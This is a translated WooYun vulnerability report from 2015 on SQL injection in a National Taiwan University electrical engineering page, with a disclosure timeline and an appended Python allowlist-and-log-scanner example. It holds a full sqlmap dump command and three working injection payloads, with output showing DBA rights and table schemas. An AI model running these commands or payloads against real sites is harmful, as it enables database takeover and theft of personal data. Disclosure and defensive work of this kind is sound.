
Vulnerability summary

Defect ID: wooyun-2015-0149922

Title: SQL injection in a page of the Department of Electrical Engineering, National Taiwan University (DBA privileges / root password leak / 35 databases / large-scale user information leak) (Taiwan region)

Affected vendor: National Taiwan University

Reporter: 路人甲

Submitted: 2015-10-28 10:46

Fixed: 2015-12-12 20:12

Published: 2015-12-12 20:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner (Hitcon Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-28: Details sent to the vendor, awaiting vendor handling
2015-10-28: Vendor confirmed; details disclosed to the vendor only
2015-11-07: Details disclosed to core white hats and domain experts
2015-11-17: Details disclosed to regular white hats
2015-11-27: Details disclosed to intern white hats
2015-12-12: Details disclosed to the public

Brief description:

SQL injection in a page of the Department of Electrical Engineering, National Taiwan University (DBA privileges / root password leak / 35 databases / large-scale user information leak)

Detailed description:

Test URL: http://**.**.**.**/news_fullpage.php?pattern=0&table_name=congratulation

python sqlmap.py -u "http://**.**.**.**/news_fullpage.php?pattern=0&table_name=congratulation" -p table_name --technique=BEU --random-agent --batch -D nslab -T member -C id,nickname,email --dump

Proof of vulnerability:

---
Parameter: table_name (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
current user: 'nslab@localhost'
current user is DBA: True
database management system users [34]:
database management system users password hashes:
available databases [35]:
Database: nslab
[44 tables]
Database: nslab
Table: member
[12 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| affiliation | varchar(100) |
| Chinese | varchar(64) |
| degree | varchar(30) |
| email | varchar(32) |
| English | varchar(16) |
| gradyear | varchar(30) |
| id | int(11) |
| location | char(1) |
| nickname | varchar(16) |
| showup | char(1) |
| type | varchar(16) |
| url | varchar(100) |
+-------------+--------------+
Database: nslab
Table: property_log
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| holder | varchar(100) |
| id | int(11) |
| logDate | text |
| objCode | text |
| object | text |
| pre_holder | varchar(100) |
+------------+--------------+
Database: nslab
Table: member
[91 entries]

Remediation:

Add input filtering.

Copyright notice: please credit 路人甲@乌云 when reposting.
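The report's remediation is "add filtering". The affected page is PHP; as an added example in Python (not code from the report or the affected site), this shows why filtering a table identifier has to be an exact-match allowlist rather than parameter binding, and runs the same check over constructed access-log lines to flag the report's boolean-blind and UNION payloads arriving in table_name. The allowlist contents (only "congratulation" is on the page; the other two entries are hypothetical), the query shapes and the log lines are all assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist of the tables news_fullpage.php is meant to read from
# (only "congratulation" appears on the page; the other two are hypothetical).
ALLOWED_TABLES = frozenset({"congratulation", "announcement", "news"})

def build_query_vulnerable(table_name):
    # The defect: the identifier goes from ?table_name= straight into the SQL text,
    # so a value such as "congratulation WHERE ..." rewrites the whole statement.
    return "SELECT * FROM " + table_name

def is_allowed_table(table_name):
    # Exact, case-sensitive match: no prefix checks, no "strip the bad characters".
    return table_name in ALLOWED_TABLES

def build_query_safe(table_name):
    # A table name cannot be bound as a prepared-statement parameter, so the only
    # robust filter for it is an allowlist; anything else is refused outright.
    if not is_allowed_table(table_name):
        raise ValueError("table_name not allowed: %r" % table_name)
    return "SELECT * FROM `%s`" % table_name

# Constructed Apache access-log lines (clients invented, hosts redacted like the page);
# the second and third carry the report's boolean-blind and UNION payloads, URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Oct/2015:10:40:01 +0800] "GET /news_fullpage.php?pattern=0&table_name=congratulation HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [28/Oct/2015:10:41:13 +0800] "GET /news_fullpage.php?pattern=0&table_name=congratulation%20WHERE%208702%3D8702%20AND%204513%3D4513%23 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [28/Oct/2015:10:41:14 +0800] "GET /news_fullpage.php?pattern=0&table_name=congratulation%20WHERE%207405%3D7405%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 6011 "-" "sqlmap/1.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def find_suspicious_requests(log_text):
    """Return (client, timestamp, decoded table_name) for each request whose
    table_name is not on the allowlist: the fixed page's check, run over the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, stamp, path, _status = m.groups()
        # parse_qs percent-decodes, so %20/%3D/%23 become the space, "=" and "#"
        # that the application itself would have seen.
        params = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for value in params.get("table_name", []):
            if not is_allowed_table(value):
                hits.append((client, stamp, value))
    return hits
```

Because the allowlist check is exact, a value that merely starts with a legitimate table name is still refused, which is precisely the shape of the payloads in the proof above.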


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-10-28 20:11

Vendor reply:

Thanks for the report.

Latest status:

None yet